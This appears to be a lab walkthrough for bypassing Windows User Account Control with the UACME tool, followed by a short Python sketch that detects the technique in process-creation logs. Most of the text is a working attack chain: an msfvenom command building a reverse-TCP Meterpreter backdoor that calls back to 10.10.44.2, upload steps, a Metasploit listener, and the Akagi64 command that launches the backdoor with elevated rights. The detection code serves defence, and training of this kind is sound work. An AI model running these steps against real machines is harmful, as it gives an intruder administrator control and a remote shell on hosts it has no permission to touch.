# Bypassing UAC using the UACME tool

Project repository: <https://github.com/hfiref0x/UACME>

**UACME:**

* Defeats Windows User Account Control (UAC) to obtain Administrator privileges.
* Abuses the built-in Windows AutoElevate executables.
* Provides 65+ methods for bypassing UAC; which ones apply depends on the Windows OS version.
* Developed by <https://twitter.com/hFireF0X>
* Written mostly in C, with some code in C++.

Get a Windows shell and check whether the admin user is a member of the Administrators group.

```
shell
net localgroup administrators
```

The admin user is a member of the Administrators group. However, we do not have high privileges yet. We can gain high privileges by bypassing UAC (User Account Control).

We are going to bypass UAC for the admin user with the help of the UACME tool.

We will generate a malicious executable using msfvenom and run it on the target machine to gain administrator privileges.

**Note:** Please make sure that you replace the local IP address used as LHOST (“10.10.44.2” in the commands on this page) with yours.

Generate the malicious executable using msfvenom:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.44.2 LPORT=4444 -f exe > 'backdoor.exe'
```

Switch to the user’s temp folder and upload the Akagi64.exe and backdoor.exe executables.

```
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls
```

Start another msfconsole and run a multi handler.

```
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.44.2
set LPORT 4444
exploit
```

Switch back to the meterpreter and run the Akagi64.exe executable.

**Note:** Please provide the full path of the backdoor executable.

```
shell
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
```

Once we execute the above command, we should receive a new Meterpreter session.

We have successfully gained high privilege access.
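From the defender's side, the sequence above leaves a recognisable trail in process-creation telemetry: a medium-integrity process is handed the path of an executable, and that executable then starts at high integrity from a user-writable Temp folder. The following Python sketch is an added example (not part of the original notes or of UACME); it assumes events shaped like Sysmon Event ID 1 records, and the sample events, the `LAB\admin` account and the rule names are constructed for illustration.

```python
import re

# Image path inside a per-user Temp directory (user-writable location).
TEMP_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
# Default UACME binary names; trivially renamed, so this rule alone is weak.
AKAGI_RE = re.compile(r"(^|\\)akagi(32|64)?\.exe$", re.I)
# Unquoted absolute .exe paths in a command line (paths with spaces are not handled).
EXE_ARG_RE = re.compile(r"[a-z]:\\[^\s\"]+?\.exe", re.I)

def detect(events):
    """Return (index, rule) findings for an ordered list of process-creation events."""
    findings = []
    handed_off = set()  # (user, exe path) passed as an argument to a Medium-integrity process
    for i, ev in enumerate(events):
        image, user = ev["Image"].lower(), ev["User"].lower()
        level = ev["IntegrityLevel"]
        if AKAGI_RE.search(image):
            findings.append((i, "UACME_DEFAULT_NAME"))
        if level in ("High", "System"):
            if TEMP_RE.match(image):
                findings.append((i, "ELEVATED_FROM_USER_TEMP"))
            # Same user, same file: it was named by a Medium process and now runs elevated.
            if (user, image) in handed_off:
                findings.append((i, "ELEVATED_AFTER_MEDIUM_HANDOFF"))
        elif level == "Medium":
            for path in EXE_ARG_RE.findall(ev["CommandLine"]):
                if path.lower() != image:
                    handed_off.add((user, path.lower()))
    return findings

def make_event(image, cmdline, level, user=r"LAB\admin"):
    return {"Image": image, "CommandLine": cmdline, "IntegrityLevel": level, "User": user}

TEMP = r"C:\Users\admin\AppData\Local\Temp"
# Constructed sample events (field names follow Sysmon Event ID 1; values are illustrative).
EVENTS = [
    make_event(TEMP + r"\Akagi64.exe", "Akagi64.exe 23 " + TEMP + r"\backdoor.exe", "Medium"),
    make_event(TEMP + r"\backdoor.exe", TEMP + r"\backdoor.exe", "High"),
    make_event(r"C:\Windows\System32\mmc.exe", r'"C:\Windows\System32\mmc.exe" eventvwr.msc', "High"),
    make_event(TEMP + r"\setup_tmp.exe", "setup_tmp.exe /quiet", "Medium"),
]

if __name__ == "__main__":
    for index, rule in detect(EVENTS):
        print(index, rule, EVENTS[index]["Image"])
```

The hand-off rule still fires when the helper binary is renamed, because it keys on the integrity-level transition of the payload path rather than on the helper's file name.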

